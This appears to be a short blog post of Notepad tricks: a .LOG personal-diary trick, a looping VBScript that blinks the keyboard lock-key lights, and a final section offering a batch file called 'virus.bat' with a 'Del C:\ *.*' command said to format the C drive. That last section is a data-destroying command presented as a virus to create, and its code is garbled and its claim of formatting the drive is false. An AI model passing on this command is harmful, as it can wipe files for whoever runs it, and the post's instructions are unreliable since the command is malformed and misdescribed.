KEYBOARD INTERFACE:
1) HOW TO MAKE AN PERSONEL DIARY USING KEYBOARD::
STEPS ARE
1. Open Notepad and Type .LOG (in capital Letters and press enter
2. Save the program with any name and close it.
3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad
Make Personal Diary Using Notepad
2) HOW MAKE YOUR KEYBOARD LIGHT MAKE DANCING USING NOTEPAD::
keyboard dancing led
In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Then save this file as dance.vbs (name can be anything but .vbs is must)
3. Open your save file and see your keyboard led blinking like disco lights.
3) HOW TO CREAT A PROGRAM THAT FORMATS C USING NOTEPAD::
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Then Save this file as virus.bat
3. Now, running this file format C Drive.
No comments:
Post a Comment